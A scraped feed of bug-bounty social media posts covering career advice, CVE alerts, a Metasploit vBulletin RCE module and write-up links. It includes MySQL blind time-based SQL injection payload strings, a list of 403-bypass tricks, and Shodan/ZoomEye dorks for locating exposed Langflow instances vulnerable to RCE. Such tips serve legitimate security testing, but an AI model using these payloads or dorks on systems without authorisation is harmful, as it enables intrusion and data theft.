Ben Sadeghipour Pick a niche, become an expert, find bugs maybe even 0days or reverse n-days, and write blogs. Even if you don’t hit those $100k bounties, it’ll be a stepping stone toward a $100k job. What niche? How to pick? Examples? infosec being so vast from web3 sec to web2, mobile,

read this kpwn.de/2023/05/javasc…

🚨Alert🚨CVE-2025-4918 & CVE-2025-4919:Two Critical Firefox 0-Day Vulnerabilities Exploited. 🧐Credit: CVE-2025-4918 from Edouard Bochin & @Ga1ois :x.com/hosselot/statu… CVE-2025-4919 from Manfred Paul 📊 9.5K+ Services are found on the hunter.how yearly. 🔗Hunter

when all the arguments have been made and several reports end up like this, you're hitting my wallet dear colleague

🚨 New unauthenticated #RCE module for vBulletin 5.1.0-6.0.3 landed in Metasploit! No CVE assigned, but credit to Egidio Romano (EgiX) for the original write-up: karmainsecurity.com/dont-call-that… 🔗 PR: github.com/rapid7/metaspl…

From SSRF to RCE and transfer money in core banking. It is really cool red team case. A perfect combination of external and internal vulnerabilities for each other to bypass the monitoring and detection of the blue team. Present by my colleague Q5Ca youtu.be/xBnMrNCuO_w?si…

Hmmm…!

Ronaldo is different gravy

Hackers 🔥 Stuck on a 403? Here are some powerful tricks to try for bypassing 🚀 1⃣ X-Forwarded-For 2⃣ X-Original-URL 3⃣ Referer 4⃣ HTTP method manipulation 5⃣ Case sensitive (/admin or /aDmIn) 6⃣ Encoding 7⃣ Path normalization Happy hunting! 🎯

#MySQL Blind Time Based Payload: 0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z 0'XOR(if (now()=sysdate(),sleep(5*1),0))XOR'Z if(now()=sysdate(), sleep(5),0) 'XOR(if(now()=sysdate(), sleep(5),0))XOR' 'XOR(if (now()=sysdate(), sleep(5*1),0))OR' #bugbountytips #bugbountytip

🚨 CVE-2025-0133 - medium 🚨 PAN-OS - Reflected Cross-Site Scripting > A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway an... 👾 cloud.projectdiscovery.io/library/CVE-20… Nuclei by ProjectDiscovery #NucleiTemplates #cve

I enjoyed Exploring and Exploiting CVE-2025-3248-Langflow RCE - Affected Endpoint: /api/v1/validate/code - ZoomEye Dork :- domain="test.com" && app="Langflow" - Shodan Dork :- ssl:"test.com" http.title:"Langflow"

Business logic and IDOR vulnerability #BugBounty

I'll be posting from prison in a while 😂 Does ibrahimxss steal user data? When you find xss in the tool, it steals data. This is the admin dashboard He threatens me if I don't delete the post #scammers #xss0r xss0r

Did Cloudflare just defeat Burp Suite and Caido? Cloudflare protection is becoming very common. This is the third app I’ve seen using it. Changing the user agent doesn’t help, and Burp TLS-fingerprint bypass plugin didn’t work. The app blocks any request when it detects

Just published my first blog post "Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover" You can read the full write-up here: zere.es/posts/cache-de…

Auraditor version 2.0.3 is out 🎉 github.com/irsdl/auraditor We should now be able to to select a Salesforce ID and enumerate it in Intruder. It supports a little bit of LWC detection from JS now. Perhaps it requires a rename in version 3.x! 😅

Never buy scripts or tools that other people sell for bug bounty. Most of those tools just waste your valuable time, make you lose direction, and can even discourage you. The best way is to put in your own effort and search for bugs yourself #BugBounty

Datr cookie theft and AI leading to Facebook account takeover ($24,000) ysamm.com/uncategorized/… Two-click Facebook account takeover via FXAuth ($30,000) ysamm.com/uncategorized/… Self-XSS in Facebook payments flow leads to account takeovers ($62,500) ysamm.com/uncategorized/…